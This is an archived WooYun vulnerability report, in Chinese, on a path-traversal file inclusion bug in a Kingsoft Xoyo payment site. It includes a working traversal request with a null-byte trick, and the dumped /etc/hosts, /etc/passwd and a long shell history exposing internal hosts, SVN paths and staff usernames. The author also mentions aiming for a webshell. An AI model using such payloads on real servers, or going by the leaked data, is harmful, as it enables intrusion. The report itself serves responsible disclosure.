金山逍遥某站点任意文件包含漏洞 | wooyun-2015-0124837| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124837

漏洞标题：金山逍遥某站点任意文件包含漏洞

漏洞作者： lijiejie

提交时间：2015-07-06 11:23

修复时间：2015-07-06 15:30

公开时间：2015-07-06 15:30

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：12

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-06：细节已通知厂商并且等待厂商处理中
2015-07-06：厂商已经确认，细节仅向厂商公开
2015-07-06：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

金山逍遥某站点任意文件包含漏洞. 服务器上有众多站点数据

详细说明：

任意文件读取：

GET /?game=njxib&r=../../../../../../../../../../etc/hosts%00.php HTTP/1.1
Referer: http://sj.pay.xoyo.com
Host: sj.pay.xoyo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*

漏洞证明：

# Do not remove the following line, or various programs
# that require network functionality will fail.
#127.0.0.1	smtp.kingsoft.com	xoyo-173 localhost.localdomain localhost
#@::1	smtp.kingsoft.com	localhost6.localdomain6 localhost6
114.255.44.156  bjad1.kingsoft.cn
#10.19.1.144  14111.tupian.xoyo.com
10.19.1.144  lb.tupian.xoyo.com
10.19.1.173     worker.tupian.xoyo.com
#10.19.1.139 histpay.db.api.xoyo.com
#10.19.1.139    kefuvip.api.xoyo.com
#10.19.1.139 img.pass.api.xoyo.com
#10.19.1.186 passport.api.xoyo.com
#58.83.211.141  ecard.xoyo.com-10.19.1.143.pool.api.xoyo.com
58.83.211.141  ecard.xoyo.com-10.19.1.144.pool.api.xoyo.com
58.83.211.141  ecard.xoyo.com-10.19.1.173.pool.api.xoyo.com
58.83.211.141  ekey.api.xoyo.com

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
mysql:x:502:502::/home/mysql:/bin/bash
www:x:500:500::/home/www:/bin/bash
nagios:x:503:503::/home/nagios:/sbin/nologin

CentOS release 5.7 (Final)
Kernel \r on an \m

获取当前用户的环境变量：

/proc/self/environ

可以看到，当前是root啊。
继续获取.bash_history,发现服务器上大量站点数据，需要找到一个合适的上传点，写入点，可获取webshell.当然，这是个非常费耐心的活儿，我翻了几个文件夹，还未找到:

/home/www/.bash_history
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jul 2015 02:31:49 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19025
ls ls /nfs0/htdocs/survey.xoyo.com/upload/surveys
cd /nfs0/htdocs/survey.xoyo.com/upload/surveys
ll
ll
ll
exit
ls
rm -rf upload
mkdir -p  public
cd public/
mkdir -p  upload
pwd
cd /data0/htdocs/survey.xoyo.com/public
ll
cd upload/
ll
ll
cd ..
ll
su www
exit
ls /data0/htdocs/survey.xoyo.com/public/upload/surveys
ln -s /nfs0/htdocs/survey.xoyo.com/public/upload/surveys   /data0/htdocs/survey.xoyo.com/public/upload/surveys
cd  /data0/htdocs/survey.xoyo.com/public/upload/
ll
cd /data0/htdocs/survey.xoyo.com/public/upload/surveys
cd /data0/htdocs/survey.xoyo.com/public/upload/surveys/
pwd
ll
cd surveys 
rm  /data0/htdocs/survey.xoyo.com/public/upload/surveys
ln -s /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/   /data0/htdocs/survey.xoyo.com/public/upload/surveys/
cd /data0/htdocs/survey.xoyo.com/public/upload/surveys
cd  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
rm  /data0/htdocs/survey.xoyo.com/public/upload/surveys
cd /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/
cd /nfs0/htdocs/survey.xoyo.com/public/upload/
rm  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
ln -s /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/   /data0/htdocs/survey.xoyo.com/public/upload/surveys/
cd  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
cd  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
 
cd  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
cd  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
 
rm   /data0/htdocs/survey.xoyo.com/public/upload/surveys/
ln -s  /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/   /data0/htdocs/survey.xoyo.com/public/upload/surveys/
ln -s   /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/     /data0/htdocs/survey.xoyo.com/public/upload/surveys/
cd   /data0/htdocs/survey.xoyo.com/public/upload/
ll
cd /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/
ll
cat > qishengfu.txt
ll
ls /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/
cd /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/
ln -s   /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/     /data0/htdocs/survey.xoyo.com/public/upload/surveys/
ln -s   /nfs0/htdocs/survey.xoyo.com/public/upload/surveys     /data0/htdocs/survey.xoyo.com/public/upload/surveys
ll
cd /data0/htdocs/survey.xoyo.com/public/upload/surveys/
ll
ln -s   /nfs0/htdocs/survey.xoyo.com/public/upload/surveys     /data0/htdocs/survey.xoyo.com/public/upload/surveys
ll
rm -rf  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
ll  /data0/htdocs/survey.xoyo.com/public/upload/surveys/
rm -rf  /nfs0/htdocs/survey.xoyo.com/public/upload/surveys/surveys/
rm  -rf /data0/htdocs/survey.xoyo.com/public/upload/surveys/
cd /data0/htdocs/survey.xoyo.com/public/upload/
ll
rm /data0/htdocs/survey.xoyo.com/public/upload/surveys
ln -s   /nfs0/htdocs/survey.xoyo.com/public/upload/surveys     /data0/htdocs/survey.xoyo.com/public/upload/surveys
cd /data0/htdocs/survey.xoyo.com/public/upload/surveys
ll
rm /data0/htdocs/survey.xoyo.com/public/upload/surveys
ln -s   /nfs0/htdocs/survey.xoyo.com/public/upload/surveys     /data0/htdocs/survey.xoyo.com/public/upload/surveys
cd /data0/htdocs/survey.xoyo.com/public/upload/surveys
ll
ll
cd ..
cd ..
ll
ll
cd public
cd pubblic
ll
pwd
cd /data0/htdocs/survey.xoyo.com/
ll
history
ls /data0/htdocs/survey.xoyo.com/public/upload/surveys
cd /data0/htdocs/survey.xoyo.com/public/
ll
cd upload
ll
pwd
ll
ll  /data0/htdocs/survey.xoyo.com/public/upload/surveys
ls
clear
svn info
svn up
exit
sv info
svn info
ls
svn up
ls
cd phone/
ls
vim index.html 
cd ..
ls
cd ..
ls
cd ..
cd ..
cd ..
cd ..
cd ..
ls
cd recsms.api.xoyo.com/
ls
svn up
cd ..
cd sendsms.api.xoyo.com
svn up api
vim api/index.php
exit
svn up
exit
svn up
svn up
ls
svn up
svn up
rm -rf api/index.php
svn up
ls
svn up
exit
svn up
ls
cd er_ms
ls
rm -rf 2013-07-12.txt
ls
svn up
cd ..
ls
svn up
ls
cd  er_ms
ls
ls
ls
cat 2013-07-12.txt
ls
exit
svn up
svn up
svn up
svn up
svn up
svn up  function.php
exit
su www
exit
ls
svn info
svn up
svn up -r56380
svn up action/
svn up template/
svn up
ls
vim include/config.php 
exit
svn up favicon.ico
exit
svn up favicon.ico
clear
ss
svn up favicon.ico
exit
svn up
svn up
svn up
exit
ll
svn up
svn up
cd ../ecard.xoyo.com/
svn up
cd ../new.kefu.xoyo.com/
ll
cd admin/
ll
cd template/
ll
dir
cd ..
ll
cd ..
ll
cd /data
ll
dir
cd data/
dir
cd admin_compile/
ll
ll
cd ../cache/
;;
ll
cd ..
ll
dir
cd admin_compile/
pwd
cd /data0/htdocs/new.kefu.xoyo.com/data/admin_compile
ll
rm -rf ./*
ll
ll
cd ../
cd ../
ll
svn up
clear
svn up
cd ../ecard.xoyo.com
ll
svn up
cd ../new
cd ../new.kefu.xoyo.com/
ll
cd admin/
ll
cd template/
ll
dir
cd service/
ll
dir
cd  account/]
cd account/
dir
vim list.html 
svn up list.html 
vim list.html 
cd ..
cd ..
cd ..
dir
cd ..
cd data/
ll
ll
cd admin_compile/
ll
cd ../compile/
ll
pwd
cd /data0/htdocs/new.kefu.xoyo.com/data/compile
ll
rm -rf ./*
ll
ll
ll
ll
vim %%BD^BDE^BDEAAAE9%%list.html.php
cd ../
ll
dir
cd /data0/htdocs/ecard.xoyo.com/
pwd
cd /data0/htdocs/ecard.xoyo.com
ll
svn up
cd ../new.kefu.xoyo.com/
ll
dir
cd admin/
ll
cd ../data/admin_compile/.svn/
cd ..
ll
pwd
cd /data0/htdocs/new.kefu.xoyo.com/data/admin_compile
ll
cd ..
ll
cd cache
ll
cd ../
ll
vim /data0/htdocs/new.kefu.xoyo.com/d
vim /data0/htdocs/new.kefu.xoyo.com/admin/template/service/account/list.html 
cd admin_compile/
ll
dir
cd ../
ll
cd ..
find ./ -name 'list.php'
pwd
cd /data0/htdocs/new.kefu.xoyo.com
svn up
find ./ -name 'list'
find ./ -name 'list.html'
find ./ -name 'list.html.php'
ll
cd ../
ll
cd new.kefu.xoyo.com/
ll
svn up
svn up
ll
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
svn up
;ll
ll
svn up
cat public/application/config/config.php
q
svn up
svn up
cd ..
cd  safe.xoyo.com/trunk/system/appconfig
svn up zizhu_config.php
cd ..
cd ..
cd ..
cd ..
cd safe.xoyo.com/trunk/app/zizhu
svn up
cd ../.../../
cd ../
cd ../
cd ../
cd ../
cd data.xoyo.com
svn up
svn up
cd /data2/proxy_cache_path/; 
cd /data0/htdocs/data.xoyo.com
cd /data2/proxy_cache_path/; 
cd /data2/proxy_cache_path/
ll
cd ..
cd ..
cd /data0/htdocs/data.xoyo.com
svn up
ps aux | grep sh
ps aux | grep sms
exity
ls
exit
svn up mytpl.class.php
clear
cd ../../
cd ../survey.xoyo.com
ll
svn up
svn up
svn up
svn up
cd ..
cd survey.xoyo.com
svn up
cd ../
ll
cd support.xoyo.com
svn up
rm safe.xoyo.com.zip
ll
cd ..
rm safe.xoyo.com.zip
ll
svn up
exit
ll
svn up
cd ../survey.xoyo.com
ll
svn up
cd ../pay.xoyo.com
snv up
svn up
cd ../survey.xoyo.com/
svn up
cd ../s.xoyo.com/
ll
svn info
cd ../survey.xoyo.com/
svn up
svn up
svn up
svn up
ll
cd ..
rm -rf word
ln -s /nfs0/htdocs/pic.xoyo.com/wenwen/word   /data0/htdocs/ask.m.xoyo.com/word
ll
svn up
svn up
svn up
exit
ll
sv info
svn info
cd /etc/mail
ll
exit
svn info
svn up
df
exit
svn up
ls
cd upload/
ll
ls  /nfs0/htdocs/pic.xoyo.com/kefu/attachments/
exit
ll
dd
ls
dir
cd ask.m.xoyo.com/
svn info
svn up
cd ../client.xoyo.com/
svn up
cd ../ecard.xoyo.com/
svn up
cd ../hu.api.xoyo.com/
svn up
cd ../lbpic.xoyo.com/
svn up
cd ../pay2.xoyo.com/
svn up
cd ../sendmail1.xoyo.com
svn up
svn up
ll
cd sendnumber/
ll
cd ..
ll
cd ..
dir
cd sms.xoyo.com/
svn up
cd ../tao.xoyo.com/
svn up
ll
dir
cd ..
dir
cd ask.xoyo.com/
svn up
cd ../comment.xoyo.com/
svn up
cd ../ekey.xoyo.com/
svn up
cd ..
dir
cd hu.xoyo.com/
svn up
cd ../log.api.xoyo.com/
svn up
cd ../pay
cd ../pay.xoyo.com/
svn up
ls
ll
cd ..
ls
dir
cd spam.api.xoyo.com/
snv up
svn up
cd ../bbs.xoyo.com/
svn up
cd ..
dir
cd data.xoyo.com/
svn up
cd ../email.xoyo.com/
svn up
cd ../kbi2.api.xoyo.com/
svn up
cd ../mark.xoyo.com/
svn up
cd ../recsms.api.xoyo.com/
svn up
cd  ../sendmail.api.xoyo.com/
svn up
cd ../support.xoyo.com/
svn up
cd ../tougao.xoyo.com/
svn up
dir
cd ..
dir
cd bdsystem.xoyo.com/
svn up
cd ..
svn info
dir
cd design.xoyo.com/
svn up
cd ../
dir
cd fsdb.api.xoyo.com/
svn up
cd ../kefu.xoyo.com/
svn up
cd ../my.xoyo.com/
svn up
cd ..
dir
cd safe.xoyo.com/
svn up
cd ..
ll
dir
cd  sendsms.api.xoyo.com/
svn up
cd ../survey.xoyo.com/
svn up
cd ../ucenter.xoyo.com/
svn up
cd ../bf.xoyo.com/
svn uo
svn up
cd ../df.pay.xoyo.com/
svn up
cd ../hd.xoyo.com/
svn up
cd ../ktsql.api.xoyo.com/
svn up
cd ../kefu.xoyo.com/
cd ../new.kefu.xoyo.com/
svn up
cd ../
dir
cd search.api.xoyo.com/
svn up
cd ../shouyou.pay.xoyo.com/
svn up
cd s.xoyo.com
cd ../s.xoyo.com
svn up
cd ../uid.api.xoyo.com/
snv up
svn up
cd ..
lls
exit
cd ask.
cd ask.m.xoyo.com/
svn up
cd ..
dir
svn co svn://svn.xoyo.com:9999/publish/ask.xoyo.com /data0/htdocs/ask.xoyo.com/
dir
cd client.xoyo.com/
svn info
ll
ls
cd ..
ks
ls
ll
ls ask.xoyo.com/
ls
cd bdsystem.xoyo.com/
svn info
svn up
cd ..
ls
ll
svn co svn://svn.xoyo.com:9999/publish/bf.xoyo.com /data0/htdocs/bf.xoyo.com 
svn co svn://svn.xoyo.com:9999/publish/client.xoyo.com /data0/htdocs/client.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/comment.xoyo.com /data0/htdocs/comment.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/data.xoyo.com /data0/htdocs/data.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/df.pay.xoyo.com /data0/htdocs/df.pay.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/ecard.xoyo.com /data0/htdocs/ecard.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/ekey.xoyo.com /data0/htdocs/ekey.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/fsdb.api.xoyo.com /data0/htdocs/fsdb.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/hd.xoyo.com /data0/htdocs/hd.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/hu.api.xoyo.com /data0/htdocs/hu.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/hu.xoyo.com /data0/htdocs/hu.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/kbi2.api.xoyo.com /data0/htdocs/kbi2.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/lbpic.xoyo.com /data0/htdocs/lbpic.xoyo.com 
svn co svn://svn.xoyo.com:9999/publish/ldap.api.xoyo.com /data0/htdocs/ldap.api.xoyo.com 
svn co svn://svn.xoyo.com:9999/publish/log.api.xoyo.com /data0/htdocs/log.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/mark.xoyo.com /data0/htdocs/mark.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/pay.xoyo.com /data0/htdocs/pay.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/recsms.api.xoyo.com /data0/htdocs/recsms.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/safe.xoyo.com /data0/htdocs/safe.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/sendmail.api.xoyo.com /data0/htdocs/sendmail.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/sendsms.api.xoyo.com /data0/htdocs/sendsms.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/shouyou.pay.xoyo.com /data0/htdocs/shouyou.pay.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/sms.xoyo.com /data0/htdocs/sms.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/spam.api.xoyo.com /data0/htdocs/spam.api.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/support.xoyo.com /data0/htdocs/support.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/survey.xoyo.com /data0/htdocs/survey.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/s.xoyo.com /data0/htdocs/s.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/tougao.xoyo.com /data0/htdocs/tougao.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/ucenter.xoyo.com /data0/htdocs/ucenter.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/uid.api.xoyo.com /data0/htdocs/uid.api.xoyo.com
ll
rm del.sh 
exit
ls
sh add_link.sh 
ll
find /data0/htdocs/ -type l | xargs ls -al
cd /data0/htdocs/ask.m.xoyo.com/word/word
ls
ll
find /data0/htdocs/ -type l | xargs ls -al
cd ..
cd /data0/htdocs/
vim add_link.sh 
rm /data0/htdocs/ask.m.xoyo.com/word/word
rm /data0/htdocs/ask.m.xoyo.com/word
cd /data0/htdocs/ask.m.xoyo.com/word/
ll
ls /nfs0/htdocs/pic.xoyo.com/wenwen/word
vim add_link.sh 
cd /data0/htdocs/
vim add_link.sh 
ln -s /nfs0/htdocs/pic.xoyo.com/wenwen/word    /data0/htdocs/ask.m.xoyo.com/word
find /data0/htdocs/ -type l | xargs ls -al
cd /data0/htdocs/ask.m.xoyo.com/word/word
ll
cd ../
ls
rm /data0/htdocs/ask.m.xoyo.com/word/
cd /data0/htdocs/ask.m.xoyo.com/word/
ll
rm -r /data0/htdocs/ask.m.xoyo.com/word/
rm -rf /data0/htdocs/ask.m.xoyo.com/word/
ll
pwd
cd ..
ls
cd /data0/htdocs/
vim add_link.sh 
ln -s /nfs0/htdocs/pic.xoyo.com/wenwen/word    /data0/htdocs/ask.m.xoyo.com/word
find /data0/htdocs/ -type l | xargs ls -al
find /data0/htdocs/ -type l | xargs ls -al | wc -l
ls
cd support.xoyo.com/
svn info
svn up
ll
ln -s /nfs0/htdocs/pic.xoyo.com/support /data0/htdocs/support.xoyo.com/pic/support 
cd /data0/htdocs/support.xoyo.com/pic/
mkdir -p  /data0/htdocs/support.xoyo.com/pic/
ln -s /nfs0/htdocs/pic.xoyo.com/support /data0/htdocs/support.xoyo.com/pic/support 
find /data0/htdocs/ -type l | xargs ls -al | wc -l
find /data0/htdocs/ -type l | xargs ls -al | wc -l
cd  /data0/htdocs/ask.m.xoyo.com/word 
ls
cd ..
ll
clear
cd /data0/htdocs/hu.xoyo.com/
ll
cd data/
ll
rz
unzip data1.zip ../data/
ll
unzip data1.zip ./../data/
cd ..
ll
cd data/
rm data1.zip 
cd ..
rz
unzip data1.zip ./data
unzip data1.zip
ll
rm data1.zip 
ll
cd data1
ll
cd ..
cd data
ll
cd ..
cp ./data1/* ./data/
cd data
ll
cd ..
cd ..
dir
ll
sz add_link.sh 
rm add_link.sh 
idr
dir
ll
exit
svn up
vim /etc/hosts
cd ../comment.xoyo.com/
svn up
cd ../pay.xoyo.com/
svn up
exit
svn up
svn up
svn up
svn up
svn up
cd /data0/htdocs/
svn co svn://svn.xoyo.com:9999/publish/my.qcz.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/my.qcz.xoyo.com
ll
svn co svn://svn.xoyo.com:9999/publish/my.qcz.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/my.qcz.xoyo.com --username  qishengfu
ll
mkdir -p my.qcz.xoyo.com
df
exir
exit
ll
cd /data0/htdocs/
exit
svn co svn://svn.xoyo.com:9999/publish/my.qcz.xoyo.com
exit
ll
svn co svn://svn.xoyo.com:9999/publish/my.qcz.xoyo.com
ll
ls my.qcz.xoyo.com/
exit
exit
ll
svn up jx.php
svn up jxib.php
svn up njxib.php
cd ..
cd ..
cd style/js/
svn up common.js
ll
cd ..
cd ..
svn template/select_channel/jx.php
svn up template/select_channel/jx.php
svn info
svn up
svn up
svn up
svn co svn://svn.xoyo.com:9999/publish/sj.pay.xoyo.com
mkdir -p sj.pay.xoyo.com
exit
svn co svn://svn.xoyo.com:9999/publish/sj.pay.xoyo.com
exit
ll
vim svn.sh 
rm svn.sh 
svn up 9tian.php
svn up bayu.php
svn up cangq.php
svn up cq.php
svn up cs.php
svn up dajiangjun.php
svn up dasong.php
svn up dreamcity.php
svn up fox3k.php
svn up fs2.php
svn up fs3.php
svn up fsdao2.php
svn up fsib.php
svn up fs.php
svn up hundun.php
svn up hxhl.php
svn up jtian.php
svn up jx2ib.php
svn up jx2.php
svn up jx2wz.php
svn up jxib.php
svn up jx.php
svn up jxsj.php
svn up kcoin.php
svn up longyin.php
svn up mala.php
svn up njxib.php
svn up rxzd.php
svn up shengdao.php
svn up shenqu.php
svn up wssanguo.php
svn up yy.php
svn up zhanshen.php
svn up
svn up
exit
svn up
sh -x   /data0/htdocs/data.xoyo.com/utility/clean_cache.sh
svn up
exit
sh -x   /data0/htdocs/data.xoyo.com/utility/clean_cache.sh
svn up
ls /data0/htdocs/data.xoyo.com/application/uds/smartycache/1/
ls /data0/htdocs/data.xoyo.com/application/uds/smartycache/1/
ls /data0/htdocs/data.xoyo.com/application/uds/smartycache/2/
ls /data0/htdocs/data.xoyo.com/application/uds/smartycache/2/
ls /data0/htdocs/data.xoyo.com/application/uds/smartycache/2/Item
ls /data0/htdocs/data.xoyo.com/application/uds/tmp/
dir /data0/htdocs/data.xoyo.com/application/uds/tmp/cache
ls /data0/htdocs/data.xoyo.com/application/uds/tmp/cache
df -h
ls /data0/htdocs/data.xoyo.com/application/uds/tmp/zlk
ls /data0/htdocs/data.xoyo.com/application/uds/tmp/zlk
svn up
svn up
cd /data0/htdocs/tougao.xoyo.com/
svn info
svn up
ll
svn co  svn://svn.xoyo.com:9999/publish/fszb.pay.xoyo.com
exit
mkdir fszb.pay.xoyo.com
exit
svn co  svn://svn.xoyo.com:9999/publish/fszb.pay.xoyo.com
ll fszb.pay.xoyo.com
exit
svn up
svn DirectController.php
svn up DirectController.php
svn up  KcardController.php
exit
svn up
history | grep 'svn co '
pwd
svn delete Thumbs.db
svn ci -m 'å é¤xxx' Thumbs.db
ln -s  /nfs0/htdocs/pic.xoyo.com/shouyou.pay/log   /data0/htdocs/shouyou.pay.xoyo.com/log 
exit
ln -s  /nfs0/htdocs/pic.xoyo.com/ucenter/avatar   /data0/htdocs/ucenter.xoyo.com/data/avatar 
ln -s  /nfs0/htdocs/pic.xoyo.com/ucenter/tmp/   /data0/htdocs/ucenter.xoyo.com/data/tmp 
ln -s  /nfs0/htdocs/pic.xoyo.com/pay/log   /data0/htdocs/pay.xoyo.com/log 
ln -s  /nfs0/htdocs/survey.xoyo.com/backimg   /data0/htdocs/survey.xoyo.com/public/backimg 
ln -s  /nfs0/htdocs/survey.xoyo.com/public/upload/surveys   /data0/htdocs/survey.xoyo.com/public/upload/surveys 
ln -s  /nfs0/htdocs/pic.xoyo.com/support   /data0/htdocs/support.xoyo.com/pic/support 
ln -s  /nfs0/htdocs/pic.xoyo.com/wenwen/word   /data0/htdocs/ask.m.xoyo.com/word 
ln -s  /nfs0/htdocs/pic.xoyo.com/shouyou.pay/log   /data0/htdocs/shouyou.pay.xoyo.com/log 
ln -s  /nfs0/htdocs/pic.xoyo.com/kefu/attachments   /data0/htdocs/new.kefu.xoyo.com/upload/attachments 
ln -s  /nfs0/htdocs/pic.xoyo.com/hd/cache/   /data0/htdocs/hd.xoyo.com/cache 
ln -s  /nfs0/htdocs/pic.xoyo.com/df.pay/log   /data0/htdocs/df.pay.xoyo.com/log 
ln -s  /nfs0/htdocs/pic.xoyo.com/hu/attachment/   /data0/htdocs/hu.xoyo.com/attachment 
ln -s  /nfs0/htdocs/pic.xoyo.com/wenwen/   /data0/htdocs/ask.xoyo.com/upfile/wenwen 
ln -s  /nfs0/htdocs/pic.xoyo.com/wenwen/word   /data0/htdocs/ask.xoyo.com/word 
exit
svn up InterfaceHelper.php
cd ..
cd controller/
svn up OrderController.php
ll
cd /data0/htdocs/
ps aux | grep pay
ll | grep pay
svn info
telnet 222.73.48.93 1521
exit
pwd
exit
ls
ls
svn info
svn up
exit
ll
pwd
svn info
svn up
svn log style/js/ueditor/php/fileUp.php
ll
svn up --help
svn up -r  68210  mkey_config.php
exit
svn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com
ls
ll
history
llsvn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com --username  wangtengfei
svn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com --username  wangtengfei
svn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com
svn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com --username  changguofeng
ls
exit
svn  up
ll
svn  up
cd ..
ll
cd new.kefu.xoyo.com/
svn up
svn up --help
svn up --username wwww
svn up --username qishengfu
vn up
svn up
svn up
exit
svn co svn://svn.xoyo.com:9999/publish/data.xd.xoyo.com data.xd.xoyo.com
cd data.xd.xoyo.com/
svn up
svn up
ll
ll
vim main/config/system.php 
vim main/config/search.php 
vim main/config/cache.php 
vim framework/conf/dbconf.php 
cd /data0/htdocs/sj.pay.xoyo.com/
ls
ls
cd framework
ls
cd ..
ls
cd frameworks
ls
cd ..
ls
rm -rf framework frameworks
ls
svn up
svn up /data0/htdocs/ask.xoyo.com/lib/wenwen_tcsql.php
svn diff  /data0/htdocs/ask.xoyo.com/lib/wenwen_tcsql.php
svn log
cd /data0/htdocs/ask.xoyo.com/lib/
svn up wenwen_tcsql.php 
exit
svn up
svn up
svn up
svn up logout.php 
vim logout.php 
svn up
svn up\
svn up\
svn up
svn up
svn up\
svn up
svn up
cd ../sms.xoyo.com
svn up
svn up
ls
ll
history |grep svn
svn co svn://svn.xoyo.com:9999/publish/xd.mall.xoyo.com
mkdir xd.mall.xoyo.com
su root
cd /data0/htdocs/
ls
svn co svn://svn.xoyo.com:9999/publish/xd.mall.xoyo.com xd.mall.xoyo.com/
ll xd.mall.xoyo.com/
ll
svn co svn://svn.xoyo.com:9999/publish/xd.mall.xoyo.com xd.mall.xoyo.com/

修复方案：

过滤

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-07-06 11:45

厂商回复：

非常感谢，收到马上跟进处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124837

漏洞标题：金山逍遥某站点任意文件包含漏洞

相关厂商：金山逍遥

漏洞作者： lijiejie

提交时间：2015-07-06 11:23

修复时间：2015-07-06 15:30

公开时间：2015-07-06 15:30

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：12

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124837

漏洞标题：金山逍遥某站点任意文件包含漏洞

相关厂商：金山逍遥

漏洞作者： lijiejie

提交时间：2015-07-06 11:23

修复时间：2015-07-06 15:30

公开时间：2015-07-06 15:30

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：12

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0124837"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

